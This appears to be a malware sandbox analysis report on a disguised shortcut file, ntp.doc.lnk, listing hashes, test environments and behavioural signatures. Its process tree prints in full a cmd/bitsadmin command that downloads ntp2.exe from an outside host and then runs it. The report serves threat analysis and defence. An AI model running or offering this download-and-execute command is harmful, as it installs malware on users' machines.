Analysis
- max time kernel: 120s
- max time network: 130s
- platform: windows7_x64
- resource: win7-20230831-en
- resource tags: arch:x64, arch:x86, image:win7-20230831-en, locale:en-us, os:windows7-x64, system
- submitted: 11/10/2023, 11:12
Static task
- static1

Behavioral task behavioral1
- Sample: ntp.docm
- Resource: win7-20230831-en

Behavioral task behavioral2
- Sample: ntp.docm
- Resource: win10v2004-20230915-en

Behavioral task behavioral3
- Sample: ntp.doc.lnk
- Resource: win7-20230831-en

Behavioral task behavioral4
- Sample: ntp.doc.lnk
- Resource: win10v2004-20230915-en
General
- Target: ntp.doc.lnk
- Size: 2KB
- MD5: 10a485b8c65306f6e992e68ab96bd6b6
- SHA1: 3537832558906a95d1669ff8ec37b1016805ec88
- SHA256: 93ef3ba4b4896b56850ef0a5f894155c163fe6d86fd5a70134b38ee1a7e2447a
- SHA512: 713cfd75c6e5ae3945ac4498c85190bdd1c41e89fd74f6b2eb16fddf6fc85befcf8e1be37fc134ca56fc0501d72d7a745872f02a8ed4a5c470b4b4cc1a62eb01
Malware Config
Signatures
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Download via BitsAdmin (1 TTPs, 1 IoCs)
  pid   Process
  2616  bitsadmin.exe
- Suspicious use of WriteProcessMemory (6 IoCs)
  description                        pid   Process   procid_target
  PID 2416 wrote to memory of 2572   2416  cmd.exe   29
  PID 2416 wrote to memory of 2572   2416  cmd.exe   29
  PID 2416 wrote to memory of 2572   2416  cmd.exe   29
  PID 2572 wrote to memory of 2616   2572  cmd.exe   30
  PID 2572 wrote to memory of 2616   2572  cmd.exe   30
  PID 2572 wrote to memory of 2616   2572  cmd.exe   30
Processes
- C:\Windows\system32\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\ntp.doc.lnk
  PID: 2416
  Suspicious use of WriteProcessMemory
  - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C bitsadmin /transfer Update /download /priority FOREGROUND https://recipemedical.com/archive/ntp2.exe C:\Users\Admin\AppData\Local\Temp\ntp2.exe' & start C:\Users\Admin\AppData\Local\Temp\ntp2.exe'
    PID: 2572
    Suspicious use of WriteProcessMemory
    - C:\Windows\system32\bitsadmin.exe
      bitsadmin /transfer Update /download /priority FOREGROUND https://recipemedical.com/archive/ntp2.exe C:\Users\Admin\AppData\Local\Temp\ntp2.exe'
      PID: 2616
      Download via BitsAdmin